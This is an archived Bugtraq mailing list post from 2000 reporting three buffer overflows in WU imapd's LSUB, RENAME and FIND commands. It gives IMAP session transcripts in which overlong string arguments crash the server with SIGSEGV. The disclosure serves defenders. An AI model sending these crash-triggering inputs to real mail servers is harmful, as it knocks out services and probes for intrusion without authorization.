Bugtraq mailing list archives
Re: another WU imapd buffer overflow
From: siva9 () CLICO PL (Michal Szymanski)
Date: Sat, 22 Apr 2000 00:24:33 +0200
Hi again, imapd seems to be very weak. I've found another three buffer overruns. This time affected commands are LSUB, RENAME and FIND: * OK mail IMAP4rev1 v12.264 server ready * login siva9 secret * OK LOGIN completed * lsub "" AAAAAAAAAAAAA.... (#A 1024 - 8179) SIGSEGV received. * OK localhost IMAP4rev1 v12.264 server ready * login siva9 secret * OK LOGIN completed * rename inbox AAAAAAAAAAAAA.... (#A 1021 - 8174) SIGSEGV received. * OK localhost IMAP4rev1 v12.264 server ready * login siva9 secret * OK LOGIN completed * find all.mailboxes AAAAAAAAAAAAA.... (#A 1026 - 8168) SIGSEGV received. It seems that all two-argument commands in authenticated state - where second argument is string - are vulnerable. I'm not sure, but ipop2/3d works fine in all states, also in transaction state. Mark, Am I right? Regards, Michal Szymanski [michal_szymanski () linux com pl];
Current thread:
- Re: another WU imapd buffer overflow Michal Szymanski (Apr 21)